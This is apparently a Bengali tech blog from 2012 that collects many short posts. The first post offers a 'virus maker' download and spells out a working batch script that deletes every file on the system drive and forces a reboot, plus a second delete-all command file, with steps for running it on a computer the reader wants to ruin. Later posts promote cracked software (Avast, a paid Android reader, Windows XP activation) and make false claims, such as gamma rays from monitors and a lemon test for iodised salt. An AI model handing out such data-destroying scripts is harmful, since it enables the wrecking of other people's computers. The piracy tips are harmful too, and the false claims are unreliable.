রবিবার, ১১ নভেম্বর, ২০১২

ভাইরাস তৈরী করুন খুব সহজে, আপনি পারবেন নিশ্চিত

কম্পিউটার কিংবা বর্তমানের স্মার্ট ফোন চালান আপনারা  সবাই নিশ্চই ভাইরাস শব্দটির সাথে পরিচিত। 
আপনি হয়ত অনেকবার অনাকাঙ্থিত ভাবে পড়ছেন ভাইরাসের কবলে। কেমন হয় যদি আজকে আপনিই একটি
ভাইরাস তৈরী করেন। 
আপনার জন্য ডাউনলোড লিংক দিলাম নিচে। এটি এতটাই সহজ আপনার কাজ শুধু ডাউনলোড করা। 


ডাউনলোড লিংক- http://www.4-shared.eu/terabit+virus+maker+download

কারও ক্ষতি করবেন না প্লিজ।

কম্পিউটার এর সকল ফাইল এবং ড্রাইভ ধংস করার জন্য ছোট একটি কোড ই যথেষ্ট।

সবাইকে সালাম জানিয়ে টিউন শুরু করছি।শিরোনাম দেখে নিশ্চয়ই বুঝেছেন টিউনের বিষয়। কে চায় নিজের পিসি ধংস করতে। কিন্তু আমি আমার পিসির ১২/২৪ টা বাজিয়ে দিয়েছি। এই .bat কোডটি দ্বারা । বিশ্বাস না হলে আপনার পিসির ফাইলগুলো নিরাপদে রেখে একবার ট্রাই করেন। আর পিসির ১২টা বাজার সময় গনেন।
আপনার এই কাজটি করার জন্য যাহা যাহা করতে হবে।
০. আপনার Computer টি নতুন করে ইন্সটল করার জন্য সকল প্রকার প্রস্তটি নিয়ে নিবেন।

১। প্রথমে নিচের কোডটি কে Notepad এ Past করুন। অথবা এখানে থেকে ডাউনলোড করে নিতে পারেন।
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00






২। ফাইলটি .bat ফর্মেটে যে কোন নামে সেভ করতে পারেন। তবে Save Type টা All files সিলেক্ট রাখবেন।

৩। সেভে করার পর নিচের চিত্রের মত একটি .bat file তৈরি হবে।

৪। এখন যে Computer টা নষ্ট করতে চান সেটাতে রান করান এই .bet ফাইলটি , তারপর ফাইলটির কাণ্ডকিত্তি দেখেন কি করা শুরু করে দিছে।
তবে সাবধান এই ফিলটি যদি ভুলে রান করে ফেলেন টেস্ট করার জন্য, তার আগে আপনার গুরুত্বপূর্ণ ফাইলগুলো অন্য পিসি বা ইউএসবিতে কপি করে নেন। তা না হলে মাথায় হাত দেওয়া ছাড়া আর কোন উপায় থাকবে না।
৫। পিসি নষ্ট করার জন্য ৮-১০ মিনিট লাগতে পারে।
৬। যখন .bat ফাইলটির তাণ্ডব শেষ হবে তখন My Computer গিয়ে দেখন C Drive ব্যতীত অন্য Drive ঊদাও। ওহ C Drive Capacity দেখুন একটু কত আছে। সাথে সাথে দেখুন আপনার পিসি কত স্লো হয়েছে।
৭। এখন আপনার পিসি Restart করে দেখুন আপনার পিসিতে Boot failor দেখা দিচ্ছে , তার মানে ১০০ % আপনাকে নতুন করে Windows Reinstall করতে হবে।
৮। আপনার নষ্ট হওয়া ডাটা উদ্দার করার জন্য আবর্ণক ভাইয়ের Easy Data Recovery Software উপর যে টিউনটা পোস্ট করেছে। তা অনুসরণ করলে আপনার ডাটা পুনরায় ফিরে পেতে পারেন। এই জন্য আপনাকে Without নতুন Partision তৈরি করে উইন্ডোজ দিয়ে আবর্ণক ভাইয়ে টিউনটি অনুসরণ করলেই হবে।
( Computer এর সকল ফাইল অ্যান্ড ফোল্ডার ডিলিট করার জন্য নিচের কোডটি ব্যবহার করতে পারেন:
DEL /F /Q *
নোটপ্যাডে Past করে যে কোন নামে .CMD ফর্মেট সেভে করুন।
তারপর যদি আপনার Computer এর সকল ফাইল/ ফোল্ডার ডিলিট করতে চান, তাহলে পারলে Run করান CMD ফাইলটি।
After Save Run CMD file )

বিঃ দ্রঃ দোয়া করে এই Tricks টি কারও ক্ষতি করার জন্য ব্যবহার করবেন না। Come to learn in techtunes and Go to serve. কারও কোন ফাইল নষ্ট বা হারিয়ে গেলে টিউনার এর দায়িত্ব বহন করবে না।

শনিবার, ১০ নভেম্বর, ২০১২

Ram সমস্যার সমাধান





Image
আপনার কম্পিউটারের মাদারবোর্ডে লাগানো Ram সমস্যা থাকলে উক্ত Ram স্লটটি মাদারবোর্ড থেকে খুলে অন্য অন্য একটি Ram স্লট লাগিয়ে পরীক্ষা করে দেখতে পারেন কোনো সমস্যা হচ্ছে কিনা...
 
Image
আপনার কম্পিউটারের মাদারবোর্ডে লাগানো Ram সমস্যা থাকলে উক্ত Ram স্লটটি মাদারবোর্ড থেকে খুলে অন্য অন্য একটি Ram স্লট লাগিয়ে পরীক্ষা করে দেখতে পারেন কোনো সমস্যা হচ্ছে কিনা
Ram স্লট খোলার জন্যে আপনি আপনার দুই হাত ব্যবহার করবেন দুই হাতের তর্জনী আঙুলের সাহায্যে Ram স্লটের দুইপাশের ক্লিপে চাপ দিন Ram স্লট সুন্দরভাবে খুলে আসবে
ত্রুটিপূর্ণ Ram সিপিউতে লাগিয়ে রাখা বুদ্ধিমানের কাজ নয় কারেণ Ram স্লটের দাম খুব একটা বেশি না সুতরাং কোনো Ram ত্রুটিপূর্ণ হয়েছে বুঝতে পারার সাথে সাথে সেটি বদলে ফেলাই ভালো নতুবা, পরবর্তীতে এর প্রভাব পড়তে পারে আপনার দামী মাদারবোর্ডে কিংবা অন্য কোনো যন্ত্রাংশের উপর
 
ধন্যবাধ
কেমন লাগল অবশ্যই কমেন্ট লিখে জানাতে ভুলবেন না

লবনের আয়োডিন আছে কিনা পরীক্ষা করুন খুব সহজে......

লবণ একটি অতি প্রয়োজনীয় জিনিস। প্রতিদিন তা আমাদের প্রয়োজন। লবণে আয়োডিন থাকে যা আমাদের দেহের জন্য খুব প্রয়োজনীয়। কিন্তু বাজারে আয়োডিন ছাড়া লবণ অনেক ব্যাবসায়ী আয়োডিন আছে বলে বিক্রি করে। তাই আপনি যদি তা সনাক্ত করতে চান তাহলে আপনাকে নিচের পদ্ধতি অনুসরন করতে হবে:
 
১। লবণ ক্রয় করুন।
২। ভাল লেবু দরকার।
৩। লেবু সামান্য লবণে কয়েক ফোটা দিন।
 
কিছুক্ষনের মাঝে যদি লবণ যদি নীল না হয় তবে বুঝতে হবে লবণ এ আয়োডিন নেই।
বিসমিল্লাহির রহমানীর রাহীম
আমার জানা মতে আমার মতো অনেক মানুষ আছে যারা তাদের সারা দিনের অধিকাংশ সময়টাই ব্যয় করেন কম্পিউটারকে নিয়ে। আবার অনেকে কাজ থাকা সত্তেও কম্পিউটারের সামনে বসতে চান না। তার প্রধান কারণ হলো চোখের সমস্যা হওয়ার ভয়ে। চোখেরসমস্যার অনেক কারনের মধ্যে আন্যতম একটি প্রধান কারন হলো কম্পিউটারের মনিটর। তার কারণ হলো মনিটর থেকে ক্ষতি কারক গামা রশ্মি বের হয়। যেটা চোখের জন্য ক্ষতিকারক। তাছাড়াও মনিটরের স্ক্রিন দিনের বেলা যতটুকু উজ্জল থাকে ঠিক ততোটুকু রাতের বেলাও থাকে অথচ রাতে ঐ আলো চোখে লাগে। অনেক রাত পর্যন্ত জেগে থাকার প্রয়োজন পড়লে মনিটরের আলো চোখে লেগে তার পর চোখ ব্যাথা ও পানি পড়া শুরু করে। যদি কেমন হয় যে আপনার চোখের খেয়াল যদি কম্পিউটার রাখে? তাহলে তো খুবই ভালো আর নিরাপদ হয়। তাই না আর এ জন্যই এখন আপনাদেরকে আমি এই সফটওয়্যারটা শেয়ার করছি। এই সফটওয়্যারটির নাম হলো F.lux । সফটওয়্যারটির সাইজ মাত্র ৫৪৬ কিলোবাইট।

স্ক্রীনশটঃ

flux
এই সফটওয়্যারটির সব চেয়ে দৃষ্টিনন্দন বিষয় হলো, মনিটরের স্ক্রিনের আলো অটোমেটিক পরিবর্তন হবে। আর সেটা ২৪ ঘন্টা সময় অনুযায়ি পরিবর্তন হবে। দিনের বেলায় কম্পিউটারের স্ক্রিন থাকবে স্বাভাবিক আর রাতের বেলায় মনিটরের আলো থাকবে আপনার চোখের জন্য মানানসই। আর এই কাজটা এই সফটওয়্যারটি সংয়কৃতভাবে করে নেবে। আপনাকে কিছুই করতে হবে না। এই সফটওয়্যারটা আপনার কম্পিউটারের সময় অনুযায়ী কাজ করবে।

ডাউনলোডঃ (সাইজ মাত্র ৫৪৬ কিলোবাইট)

অ্যান্ড্রয়েড চালিত স্মার্টফোনে যে অ্যাপ্লিকেশনগুলো আপনার লাগবেই

অ্যান্ড্রয়েড চালিত স্মার্টফোনে যে অ্যাপ্লিকেশনগুলো আপনার লাগবেই

অ্যান্ড্রয়েড চালিত স্মার্টফোন যে কারণে অন্য সকল স্মার্টফোনকে জনপ্রিয়তায় ছাড়িয়ে গেছে, সেটা হলো এর তুলনামূলক কম দাম এবং লাখ লাখ অ্যাপ্লিকেশন। এসব অ্যাপ্লিকেশন ডাউনলোডের জন্য কর্তৃপক্ষীয় ওয়েবসাইট হচ্ছে গুগল প্লে স্টোর, যেটা আগে অ্যান্ড্রয়েড মার্কেট নামে পরিচিত ছিল। তবে আরো অনেক ওয়েবসাইট আছে যেগুলো থেকে অ্যাপ্লিকেশন ডাউনলোড করা যায়। তবে সেগুলো গুগল স্বীকৃতি দেয় না।
এতো লম্বা ভূমিকা করলাম এজন্য, বাংলাদেশের অ্যান্ড্রয়েড ব্যবহারকারীদের অধিকাংশ নতুন। ফলে লাখ লাখ অ্যাপ্লিকেশনের মধ্য থেকে প্রয়োজনীয় অ্যাপসগুলো বেছে নিতে তাদের দ্বিধায় পড়তে হয়। তাছাড়া বাংলাদেশে ইউটিউব বন্ধের প্রভাবে গুগলের অধিকাংশ সেবাই মাঝে মধ্যে নানা প্রতিবন্ধকতায় পড়ে। প্রায় সময় প্লে স্টোরে লগইন করা যায় না। ফলে অ্যাপ্লিকেশনও ডাউনলোড করা যায় না।
আমি এখন প্রয়োজনীয় কয়েকটা অ্যাপ্লিকেশন সম্পর্কে বলবো। সবশেষে নিচে সবগুলো অ্যাপ্লিকেশনের ডাউনলোড লিংক দিয়ে দিয়েছি। এগুলো আমার বক্স অ্যাকাউন্টে আপলোড করা। কোন সমস্যা ছাড়াই সরাসরি ডাউনলোড করতে পারবেন। পিসি থেকে ডাউনলোড করলে আপনার ফোনের এসডি কার্ডে নিয়ে নিতে পারবেন।
Android Assistant:
চরম একটা অ্যাপ্লিকেশন। এই একটা অ্যাপ্লিকেশন দিয়েই আপনি অনেকগুলো কাজ করতে পারবেন, যেগুলো করতে আপনি হয়তো এতোদিন একাধিক অ্যাপ্লিকেশন ব্যবহার করে এসেছেন। আমার মতো যারা অ্যান্ট্রি লেভেল ইউজার, তাদের ডিভাইসে ইন্টারনাল মেমোরি কম থাকে। এই এপ্লিকেশন আপনার মেমোরি অনেকখানি সেভ করবে। অ্যাপ্লিকেশন ব্যাকআপ ও রিস্টোর, অ্যাপ্লিকেশন এসডি কার্ডে ট্রান্সফার, অ্যাপ্লিকেশন ইনস্টল ও আনইনস্টল, ক্যাশ ও সিস্টেম ক্লিনসহ আরো অনেক ধরনের কাজ করতে পারবেন এটা দিয়ে।
Battery:
আপনার ডিভাইসের ব্যাটারির চার্জ কত পাসের্ন্ট আছে, ডিভাইসের কোন প্রোগ্রাম কতটুকু চার্জ নিচ্ছে, ডিভাইসের টেম্পারেচার এইসব জানতে পারবেন এটা দিয়ে। নোটিফিকেশন সেটিং অ্যাকটিভ রাখলে উপরে নোটিফিকেশন বারে ব্যাটারির চার্জ কত পাসের্ন্ট আছে তা প্রদর্শন করবে।
Blocker:
এই অ্যাপ্লিকেশন দিয়ে যে কোন নম্বরের কল, এসএমস ব্লক করে রাখতে পারবেন। টাকা খরচ করে মোবাইল অপারেটরগুলোর ভ্যালু অ্যাডেড সার্ভিস চালু রাখতে হবে না। আমি এটা দিয়ে বাংলালিংকের ২২২২, ৫৮৫৮ ব্লক করে রেখেছি... :)
Dolphin Browser:
আমার মতে অ্যান্ড্রয়েডের জন্য সেরা ব্রাউজার এটা। সেটিংস থেকে ‘টেক্সট অ্যানকোডিং’ এ গিয়ে ইউনিকোড সিলেক্ট করে রাখলে ঝকঝকে তকতকে বাংলা পড়া যায়। লোডিং টাইমও অনেক কম।
Dr.Web Anti-virus Light ও ESET Security:
চমৎকার দুইটা অ্যান্টিভাইরাস। ইসেট একমাসের ট্রায়াল ভার্শন। ড. ওয়েব ফ্রি ভার্শন। যার যেটা লাগে ডাউনলোড করে নেন।
File Hide Expert:
নামেই পরিচয়। যে কোন ফাইল কিংবা ফোল্ডার লুকিয়ে রাখতে পারবেন। তবে সাবধান, অসর্তকতাবশত `sd card’ ফোল্ডারটা আবার হাইড করে ফেলেন না যেন।
Flashlight:
আপনার ক্যামেরার ফ্লাশকে টর্চ লাইট হিসেবে ব্যবহার করতে পারবেন। যাদের ক্যামেরায় ফ্লাশ নেই, তারা ডিসপ্লেকে ফ্লাশলাইট হিসেবে ব্যবহার করতে পারবেন।
Fring
ফ্রি কথা বলার অসাধারণ সফটওয়ার। প্রতি ঘণ্টায় সর্বোর্চ্চ ৬-৭ মেগাবাইট খরচ হবে। আমি মাঝে মধ্যে দেশের বাইরে কল করি এটা দিয়ে।
LoderDroid:
পিসিতে যেমন আইডিএম, তেমনি অ্যান্ড্রয়েডে লোডার ড্রয়েড। আমার কাছে এখন পর্যন্ত আইডিএম এর সবচেয়ে ভালো বিকল্প।
Mayabi Keyboard:
যারা কম্পিউটারে অভ্র দিয়ে ফোনেটিক ব্যবহার করেন, অ্যান্ড্রয়েড ডিভাইসে তাদের জন্য এই সফটওয়ারটা আশীর্বাদ। অবশ্য কিছুদিন আগে ‘রিদ্মিক কীবোর্ড’ নামে আরেকটা অ্যাপ্লিকেশন তৈরি করেছেন বুয়েটের এক শিক্ষার্থী। ওই অ্যাপসে ইউনিজয় লে আউট কাজ করে। আমার ডিভাইসে রিদ্মিক সাপোর্ট করে না বিধায় আপাতত আপনাদের দিতে পারলাম না।
Music Folder Player:
এসডি কার্ডের যে ফোল্ডারে যেসব মিউজিক রেখেছেন, এই অ্যাপ্লিকেশন দিয়ে সে অনুযায়ী গান প্লে করতে পারবেন। যারা অ্যালবাম কিংবা আর্টিস্ট অনুযায়ী গান সাজিয়ে রাখেন, তাদের জন্য বেশ কাজের একটা সফটওয়ার।
MX Player:
ভিডিও প্লে করার জন্য নিঃসন্দেহে সেরা সফটওয়ার। এইটার উপরে কোন সফটওয়ার নাই।
NeoReader:
কিউ আর কোড, বারকোডসহ চার ধরনের কোড রিড করতে পারে এই অ্যাপ্লিকেশনটা।
RepliGo Reader:
আপনারা যারা নিচের ডাউনলোড লিংকে প্রবেশ করবেন, তারা লক্ষ্য করবেন শুরুতেই ‘অ্যাডোবি রিডার’ অ্যাপ্লিকেশনটি রয়েছে। অবাক হতে পারেন, অ্যাডোবির কথা আমি কেন বলিনি। আমার ডিভাইসে বাই ডেফল্ট অ্যাডোবি দেওয়া ছিল, তারপরও আমি এই RepliGo Reader ব্যবহার করি। কারণটা হলো, অ্যান্ট্রি লেভেলের অ্যান্ড্রয়েড ডিভাইসে অ্যাডোবি দিয়ে, বিশেষ করে বাংলা পিডিএফ, বই হ্যাং হয়ে যায়। কিন্তু একই বই RepliGo দিয়ে স্মোথলি পড়া যায়।
RepliGo কিন্তু পেইড অ্যাপস!!! পাক্কা এক রাত জেগে নেট ঘেঁটে এটা নামিয়েছি। আপনারা এখন এটা একদম ফ্রি ব্যবহার করতে পারবেন।
uTorrent:
টরেন্ট সম্পর্কে আমার নিজের ধারণা খুব কম। যারা টরেন্ট ব্যবহার করেন, তাদের জন্য হয়তো এটা কাজে লাগবে।
এই সবগুলো অ্যাপ্লিকেশন সরাসরি পিসি কিংবা অ্যান্ড্রয়েড ডিভাইসে ডাউনলোড করতে পারবেন আমার বক্স অ্যাকাউন্ট থেকে। মিডিয়াফায়ারের মতোই বক্সও একটা অনলাইন ফাইল স্টোরেজ। বরং মিডিয়াফায়ারের চেয়েও আরো সিম্পল মনে হয় আমার কাছে।
ডাউনলোড লিংক: https://www.box.com/s/ncvfucad9x1mvhfrpogs/1/475494952

Facebook এর জন্য কভার ফটো........

Cover Photo-01

Cover photo-2

Cover photo-3

cover photo-4


Cover photo-5
Cover photo-6

Cover photo-7

Cover photo-8

Cover photo-9

Cover photo-10

Cover photo-11

Cover photo-12 

Cover photo-13
Facebook এর জন্য কভার ফটো গুলো যদি ভালো লাগে মন্তব্য করুন। সবাই ভালো থাকবেন। আল্লাহ হাফেজ।

৭০০+ ‍‌আইকন এক সাথে ডাউনলোড করুন

আমার ওয়েব সাইট বা কম্পিউটারের ব্যবহারের জন্য বিভিন্ন আইকন ব্যবহার করি। এইসব আইকম ডাউনলোডের প্রচুর সাইট আছে কিন্তু তা একটা একটা করে দেখে দেখে ডাউনলোড করতে হয়। এতে অনেক সময়ের প্রয়োজন হয়। আমি আজকে আপনাদের ৭০০+ আর্কষনীয় আইকন একসাথে দিচ্ছি। আপনারা ডাউনলোড করে ব্যবহার করতে পারবেন।

ব্যবহারের সুবিধা :

  • এই আইকন প্যাকে প্রায় সকল প্রকার আইকন আছে।
  • ফোল্ডার রিসাইজ করা নেই আপনার বিভিন্ন সফটওয়ার এর মাধ্যমে ফোল্ডার উপযোগী করে তুলতে পারবেন।
  • সব আইকনেই PNG তাই ব্যবহারে বিরাট সুবিধা, ওয়েব থেকে কম্পিউটার এর ফোল্ডার সব জায়গায় ব্যবহার উপযোগী।
  • সব গুলো আইকনেই হাইডেফিনেশন ।

ডাউনলোড লিংক

ডাউনলোড করলেই বুঝবেন কত বড় উপকারে লাগছে। সবাইকে ধন্যবাদ।

কাজের কিছু অসাধারন সফটওয়্যার না দেখলে মিস করবেন ।


আসসালামু-আলাইকুমঃ কেমন আছেন সবাই , আশা করি সবাই ভাল আছ, ভাল থাক, সুন্দর থাক, স্বুস্থ থাক , নিরাপদে থাক এটাই আমি সব সময় প্রত্যাশা করি, আপনাদের সর্ব সাফল্য আমি একান্ত ভাবেই কামনা করি।
আমরা জানি তথ্যপ্রযুক্তি এগিয়ে যাচ্ছে। ধরা দিচ্ছে প্রযুক্তির নাগালের অবস্থানরত মানুষের হাতে। প্রযুক্তি নির্ভর মানুষগুলোর কারণেই তথ্যপ্রযুক্তি সামনের দিকে এগিয়ে যাচ্ছে এবং ক্রমবর্ধমান জনসংখার সাথে সাথে বাড়ছে প্রযুক্তি তৈরি হচ্ছে নতুন নতুন পরিকল্পনা । কাজের কথায় আসি, আজ আমি আপনাদের সাথে কাজের কিছু অসাধারন সফটওয়্যার শেয়ার করব। সব গুলু সফটওয়্যার আমি নিজে ব্যাবহার করেছি তাই আমি আপনাদের সাথে শেয়ার করলাম। ভাল লাগ্লে কমেন্ট করে জানাবেন।
1
PhotoFiltre.Studio.X.10.7.0 Full latest version
2
Download a Nice screen of windows media Player
3
EASY folder lock
4
Avast Crack Untill 2050
5
CCleaner profational Edition
7
TeamViewer Latest version
8
AnyDVD & AnyDVD HD 7.0.9.6 Full Latest version
9
OpenCloner DVD-Cloner 9.70 Full latest version
12
Uniblue DriverScanner 2013 Full latest version

ফেসবুক ইমেইল নোটিফিকেশন বন্ধ করুন ……।


How to disable email notifications from social networks ইমেলে ফেসবুকের অত্যাচার !!! আর হবে না দেখে নিন
আসসালামু আলাইকুম সবাই কেমন আছেন? আশা করি ভালই আছেন। আমাদের সবারই ফেসবুক একাউন্ট আছে। আমরা সবাই ফেসবুক চলাই। কিন্তু ফেসবুক চালাতে ভাল লাগলেও আমরা যখন আমাদের ইমেল খুলি তখন আর আমাদের ভাল লাগে না, মাঝে মাঝে ইচ্ছে করে ফেসবুক ব্যবহার বন্ধ করে দেই। তো বন্ধুরা ফেসবুক বন্ধ করতে হবে না। আমি আজ একটি ট্রিকস দেখাব, যা আপনার ইমেলে ফেসবুক এর Notification  আর দেখাবে না। তা অন্য একটি ফোল্ডার এ চলে যাবে।

১. প্রথমেই আপনাকে যা করতে হবে তা হল আপনার ইমেল একাউন্টটি লগইন করুন।
২. তারপর ইমেল এর Settings  এ চলে যান সরাসরি।
৩. তারপর সেখানে গিয়ে Filters  আপশনে চলে যান।
৪. তারপর সেখানে গিয়ে Create a new filter ক্লিক কর।
৫. তারপর একটি বক্স আসবে। সেখানে আপনি যে ওয়েবসাইটের Notification     বন্ধ করতে চান তার নাম দিন। যেমনঃ আপনি ফেসবুক এর বন্ধ করতে চাইলে এখানে facebook  লিখবেন।
Capture4 ইমেলে ফেসবুকের অত্যাচার !!! আর হবে না দেখে নিন
৬. তারপর Create filter with this search » এ ক্লিক করুন, এতে ক্লিক করলেই আর একটি বক্স আসবে সেখানে আপনি Skip the Inbox (Archive it) বাটনে ক্লিক করুন।
৭. এবং সর্বশেষ যে কাজ আপনি Create Filter  এ ক্লিক করুন।
এইতো হয়ে গেলো এখন আর ফেসবুক এর Notification মেসেজ আর আসবে না।
ট্রিকসটি ভাল লাগলে শেয়ার করবে। লাইক ও কমেন্ট এর মাধ্যমে বলবেন।

দেখ নিন Alt কী এর কিছু ক্যারেক্টার ……।


আপনি alt কী দিয়ে কিছু ক্যারেকটার তৈরি করতে পারেন জা কীবোর্ড এ নেই ……। আপনি নিচের বক্স টা দেখেন এবং alt কী ধরে রেখে নাম্বার টিপুন ব্যাস আপনার পছন্দের ক্যারেকটার টি তৈরি হয়ে গেল ……………। এটা আপনি ফেসবুক পোস্ট সহ নানা কাজে ব্যাবহার করতে পারবেন …………।
Character ALT Code*
Character ALT Code*
Character ALT Code*
Character ALT Code*
Character ALT Code*
[backspace] Alt 8
E Alt 69
q Alt 113
ó Alt 162
® Alt 0174
[tab] Alt 9
F Alt 70
r Alt 114
ú Alt 163
¯ Alt 0175
[line break] Alt 10
G Alt 71
s Alt 115
ñ Alt 164
² Alt 0178
¤ Alt 15
H Alt 72
t Alt 116
Ñ Alt 165
³ Alt 0179
Alt 20
I Alt 73
u Alt 117
ª Alt 166
´ Alt 0180
§ Alt 21
J Alt 74
v Alt 118
º Alt 167
¸ Alt 0184
[paste] Alt 22
K Alt 75
w Alt 119
¿ Alt 168
¹ Alt 0185
[space] Alt 32
L Alt 76
x Alt 120
¬ Alt 170
¾ Alt 0190
! Alt 33
M Alt 77
y Alt 121
½ Alt 171
À Alt 0192
Alt 34
N Alt 78
z Alt 122
¼ Alt 172
Á Alt 0193
# Alt 35
O Alt 79
{ Alt 123
¡ Alt 173
 Alt 0194
$ Alt 36
P Alt 80
| Alt 124
« Alt 174
à Alt 0195
% Alt 37
Q Alt 81
} Alt 125
» Alt 175
Ä Alt 0196
& Alt 38
R Alt 82
~ Alt 126
¦ Alt 179
Å Alt 0197
Alt 39
S Alt 83
 Alt 127
ß Alt 225
È Alt 0200
( Alt 40
T Alt 84
Ç Alt 128
µ Alt 230
É Alt 0201
) Alt 41
U Alt 85
ü Alt 129
± Alt 241
Ê Alt 0202
* Alt 42
V Alt 86
é Alt 130
° Alt 248
Ë Alt 0203
+ Alt 43
W Alt 87
â Alt 131
Alt 249
Ì Alt 0204
, Alt 44
X Alt 88
ä Alt 132
· Alt 250
Í Alt 0205
- Alt 45
Y Alt 89
à Alt 133
Alt 0128
Î Alt 0206
. Alt 46
Z Alt 90
å Alt 134
Alt 0132
Ï Alt 0207
/ Alt 47
[ Alt 91
ç Alt 135
Alt 0133
Ð Alt 0208
0 Alt 48
\ Alt 92
ê Alt 136
Alt 0134
Ò Alt 0210
1 Alt 49
] Alt 93
ë Alt 137
Alt 0135
Ó Alt 0211
2 Alt 50
^ Alt 94
è Alt 138
ˆ Alt 0136
Ô Alt 0212
3 Alt 51
_ Alt 95
ï Alt 139
Alt 0137
Õ Alt 0213
4 Alt 52
` Alt 96
î Alt 140
Š Alt 0138
Ö Alt 0214
5 Alt 53
a Alt 97
ì Alt 141
Alt 0139
× Alt 0215
6 Alt 54
b Alt 98
æ Alt 145
Œ Alt 0140
Ø Alt 0216
7 Alt 55
c Alt 99
Æ Alt 146
Alt 0145
Ù Alt 0217
8 Alt 56
d Alt 100
ô Alt 147
Alt 0146
Ú Alt 0218
9 Alt 57
e Alt 101
ö Alt 148
Alt 0147
Û Alt 0219
: Alt 58
f Alt 102
ò Alt 149
Alt 0148
Ü Alt 0220
; Alt 59
g Alt 103
û Alt 150
Alt 0150
Ý Alt 0221
< Alt 60
h Alt 104
ù Alt 151
Alt 0151
Þ Alt 0222
= Alt 61
i Alt 105
ÿ Alt 152
˜ Alt 0152
ã Alt 0227
> Alt 62
j Alt 106
¢ Alt 155
Alt 0153
ð Alt 0240
? Alt 63
k Alt 107
£ Alt 156
š Alt 0154
õ Alt 0245
@ Alt 64
l Alt 108
¥ Alt 157
Alt 0155
÷ Alt 0247
A Alt 65
m Alt 109
P Alt 158
œ Alt 0156
ø Alt 0248
B Alt 66
n Alt 110
ƒ Alt 159
Ÿ Alt 0159
ü Alt 0252
C Alt 67
o Alt 111
á Alt 160
¨ Alt 0168
ý Alt 0253
D Alt 68
p Alt 112
í Alt 161
þ Alt 0254
© Alt 0169
সামনে ইনশাল্লাহ আরও কিছু কোড নিয়ে হাজির হব ………

মজিলা ফায়ার ফক্স এর গতি বাড়িয়ে নিন.......

সবাইকে শুভেচ্ছা । আমি ভাল আছি আশা করি আপনারাও ভাল আছেন। অনেকেই হয়ত এই Tricks টা জনেন বা এই বিষয় নিয়ে আগেও পোস্ট হয়ে থাকতে পারে। যদি হয়ে থাকে তাহলে আমি ক্ষমা চেয়ে নিচ্ছি। বক বক না করে কাজ শুরু করি:
 বাড়িয়ে নিন আপনার Mozilla Firefox এর গতি
প্রথমে আপনার Browser এর Address Bar এ about:config” লিখে Enter চাপুন।
এবার একটি Notification পেলে Ok ক্লিক করুন। উপরের Search Box এ “network.http” টাইপ করুন এবং Enter দিন।
“‘network.http.pipelining” এবং ”network.http.proxy.pipelining” এই দুটি Option এ Double Click করুন।
“network.http.pipelining.maxrequests” Right Click করে Value টাকে “30” তে Modify করুন। ডান পাশে খালি জায়গায় Right Click করে “New” Select করুন তারপর “integer” Select করুন।তারপর “nglayout.initialpaint.delay”এই Name টি লিখুন এবং OK Press করুন তারপর Type করুন “0” ব্যাস!! কাজ শেষ!! আবার দেখুন আপনার Firefox কত Fast হয়ে গেছে!!
বিঃদ্রঃ Firefox Browser সব সময় আপগ্রেডটা ব্যবহার করুন। ধন্যবাদ।

কোরআন শরীফ পড়ুন আপনার মোবাইলে


 এই ডিজিটাল যুগে মোবাইল নাই এমন মানুষ পাওয়া মুশকিল। অন্তত জাভা মোবাইল নাই এমন মানুষ পাওয়া যাবেনা। তাই আপনাদের জন্য আমার আজকে ক্ষুদ্র চেষ্টা।
সিম্বিয়ান ইউজার
যাদের s60v3 সেট আছে তাদের জন্য কোরআন শরীফ পড়ার সুন্দর একটা সফট আছে। নাম

ASGATech Quran।

তবে এইটা Install করার পূর্বে আপনার সেট হ্যাক করে নিতে হবে। নিচে কিছু স্কিনশট দেয়া হল।

এখানে সব গুলো সূরার নাম দেয়া আছে। আপনার যেটা পড়ার দরকার সেটার উপর ক্লিক করে পড়তে পারবেন।

সূরা ফাতিহা। লেখার স্টাইল টা অ্যারাবিয়ান কুরআন এর অনুকরণে লেখা।

চাইলে আয়াত বা সূরার নাম দিয়ে সার্চ দিতে পারবেন।

এখানে লিখে সার্চ দিন।

Rules of Tajweed এ আপনি তাজভিদ সহকারে পড়ার নিয়ম গুলো পাবেন। কিন্তু এখানে সব আরবিতে দেয়া। তাই যারা বুজবেন না তাদের একটু কষ্ট হবে।

এখানে মদ্দে আসলির নিয়ম গুলো দেয়া। কিন্তু আরবিতে।

একটু আসুবিধা হলেও সুন্দর ভাবেই পড়াযায়। আশা করি আপনাদের ও ভাল লাগবে।
এবার ডাউনলোড এর পালা। ডাউনলোড করতে এখানে ক্লিক করুন।
জাভা ইউজার
সিম্বিয়ান নিয়ে অনেক বকবকানি করলাম। তারা সুন্দর একটা সফট ও পেলেন।কিন্তু জাভা ভাইরা কি করবেন। নো চিন্তা ডু ফুর্তি। আপনাদের জন্য ও আছে। নিছে স্কিনশট গুলো দেখেনি।


ডাউনলোড করতে এখানে ক্লিক করুন।
আশা করি আপনাদের ভাল লেগেছে। আর এ থেকে যদি আপনাদের কোন উপকার হয় তাহলে আমার টিউন সার্থক। কিছু সওয়াব ও হবে।
আল্লাহ আমাদের সকল কে কোরআন পড়ার তৌফীক দিন। আমিন

Windows Xp জেনুইন করুন। কোন জামেলা ছাড়াই


অনেক সময় কাজ করতে গেলে ম্যাসেজ আসে xp জেনুইন নয়। এজামেলা থেকে মুক্তিপেতে আপনার xp জেনুইন করে নিন। নিচে স্ক্রীন শর্ট সহ বিস্তারিত দেওয়া আছে, আশাকরি আপনাদের বুঝতে সমস্যা হবে না। ভালো ‍থাকবেন। ভালো লাগলে মন্তব্য করবেন।

জেনুইন কিভাবে করবেন

এই ফাইলটা ডাউনলোড করুন, করে extract করুন! নিচের ছবির মত ৪টা ফাইল পাবেন।
tune12 এক্সপি জেনুইন করুন এক ক্লিকে ও সেই জেনুইন করার ফাইল বানান নিজেই
Run এ ডাবল ক্লিক করুন! হয়ে গেলো আপনার উইন্ডোজ জেনুইন ! হে হে হে ! icon biggrin এক্সপি জেনুইন করুন এক ক্লিকে ও সেই জেনুইন করার ফাইল বানান নিজেই

জেনুইন নাকি কিভাবে চেক করবেন

MGADiag এ ডাবল ক্লিক করে রান করেন।
tune22 এক্সপি জেনুইন করুন এক ক্লিকে ও সেই জেনুইন করার ফাইল বানান নিজেই
নিচের ছবির মত আসবে, “Continue” করুন।
tune32 এক্সপি জেনুইন করুন এক ক্লিকে ও সেই জেনুইন করার ফাইল বানান নিজেই
তাহলে সবুজ কালিতে দেখাবে জেনুইন কিনা
tune41 এক্সপি জেনুইন করুন এক ক্লিকে ও সেই জেনুইন করার ফাইল বানান নিজেই

